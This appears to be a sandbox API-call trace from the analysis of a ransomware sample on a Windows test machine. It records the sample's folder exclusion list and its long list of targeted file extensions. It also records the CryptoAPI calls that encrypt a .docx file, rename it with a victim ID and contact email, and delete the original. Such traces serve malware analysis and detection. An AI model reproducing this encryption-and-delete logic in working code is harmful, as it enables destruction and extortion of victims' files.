	[0184.151] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0184.151] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.*"
	[0184.151] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb8633609, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xb8633609, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0184.151] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.*") returned 35
	[0184.151] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0184.152] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.*", cchLength=0x23 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\*.*") returned 0x23
	[0184.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.152] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="windows") returned 0x0
	[0184.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.152] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="boot") returned 0x0
	[0184.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.152] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="system volume information") returned 0x0
	[0184.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.153] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0184.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.153] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="temp") returned 0x0
	[0184.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.153] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="program files") returned 0x0
	[0184.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.153] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="program files (x86)") returned 0x0
	[0184.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.155] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="appdata") returned 0x0
	[0184.155] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.155] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="application data") returned 0x0
	[0184.155] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.155] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="winnt") returned 0x0
	[0184.155] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.155] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="tmp") returned 0x0
	[0184.156] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.156] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="cache") returned 0x0
	[0184.156] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.156] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="temporary internet files") returned 0x0
	[0184.156] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.156] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="webcache") returned 0x0
	[0184.156] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.156] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="inetcache") returned 0x0
	[0184.157] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.157] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="nvidia") returned 0x0
	[0184.157] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.157] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="packages") returned 0x0
	[0184.157] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.157] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="cookies") returned 0x0
	[0184.157] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.158] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\*.*", lpSrch="programdata") returned 0x0
	[0184.158] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb8633609, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xb8633609, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0184.158] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98bde160, ftCreationTime.dwHighDateTime=0x1d972dd, ftLastAccessTime.dwLowDateTime=0xac6ec390, ftLastAccessTime.dwHighDateTime=0x1d974f5, ftLastWriteTime.dwLowDateTime=0xac6ec390, ftLastWriteTime.dwHighDateTime=0x1d974f5, nFileSizeHigh=0x0, nFileSizeLow=0x2741, dwReserved0=0x0, dwReserved1=0x0, cFileName="-9Z 1.docx", cAlternateFileName="-9Z1~1.DOC")) returned 1
	[0184.158] lstrcmpW (lpString1="-9Z 1.docx", lpString2="..") returned 1
	[0184.158] lstrcmpW (lpString1="-9Z 1.docx", lpString2=".") returned 1
	[0184.158] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0184.158] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="-9Z 1.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\-9Z 1.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\-9Z 1.docx"
	[0184.158] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\-9Z 1.docx") returned 42
	[0184.159] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0184.159] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\-9Z 1.docx", cchLength=0x2a | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\-9z 1.docx") returned 0x2a
	[0184.159] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.159] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\-9z 1.docx", lpSrch="help_decrypt_your_files") returned 0x0
	[0184.159] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\-9z 1.docx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\-9z 1.docx") returned="c:\\users\\rdhj0cnfevzx\\documents\\-9z 1.docx"
	[0184.159] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\-9z 1.docx") returned 42
	[0184.159] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0184.160] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.160] StrStrW (lpFirst=".docx", lpSrch=".") returned=".docx"
	[0184.160] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.160] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".docx") returned=".docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0184.160] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0184.161] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0184.161] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\-9z 1.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\-9z 1.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0184.164] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x2741, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x2741, lpOverlapped=0x0) returned 1
	[0184.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.167] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcba18) returned 1
	[0184.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.169] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0184.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.169] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0184.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.170] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0184.170] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.170] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x2741, dwBufLen=0x2741 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x2750) returned 1
	[0184.171] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0184.171] RtlMoveMemory (in: Destination=0xfdf8d0, Source=0xfdd180, Length=0x2741 | out: Destination=0xfdf8d0) 
	[0184.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.172] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdf8d0*, pdwDataLen=0x18bc0c*=0x2741, dwBufLen=0x2750 | out: pbData=0xfdf8d0*, pdwDataLen=0x18bc0c*=0x2750) returned 1
	[0184.172] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.173] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0184.173] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.173] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0184.173] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.173] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0184.173] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0184.173] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0184.174] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.174] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0184.175] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\-9z 1.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 84
	[0184.175] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\-9z 1.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\-9z 1.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0184.178] WriteFile (in: hFile=0x388, lpBuffer=0xfdf8d0*, nNumberOfBytesToWrite=0x2750, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfdf8d0*, lpNumberOfBytesWritten=0x18c068*=0x2750, lpOverlapped=0x0) returned 1
	[0184.182] CloseHandle (hObject=0x388) returned 1
	[0184.182] CloseHandle (hObject=0x384) returned 1
	[0184.182] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\-9z 1.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\-9z 1.docx")) returned 1
	[0184.191] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\-9z 1.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\-9z 1.docx")) returned 0
	[0184.191] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1b11590, ftCreationTime.dwHighDateTime=0x1d929a0, ftLastAccessTime.dwLowDateTime=0xba877e80, ftLastAccessTime.dwHighDateTime=0x1d93027, ftLastWriteTime.dwLowDateTime=0xba877e80, ftLastWriteTime.dwHighDateTime=0x1d93027, nFileSizeHigh=0x0, nFileSizeLow=0x7c05, dwReserved0=0x0, dwReserved1=0x0, cFileName="-kAUovy5h.xlsx", cAlternateFileName="-KAUOV~1.XLS")) returned 1
	[0184.191] lstrcmpW (lpString1="-kAUovy5h.xlsx", lpString2="..") returned 1
	[0184.191] lstrcmpW (lpString1="-kAUovy5h.xlsx", lpString2=".") returned 1
	[0184.192] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
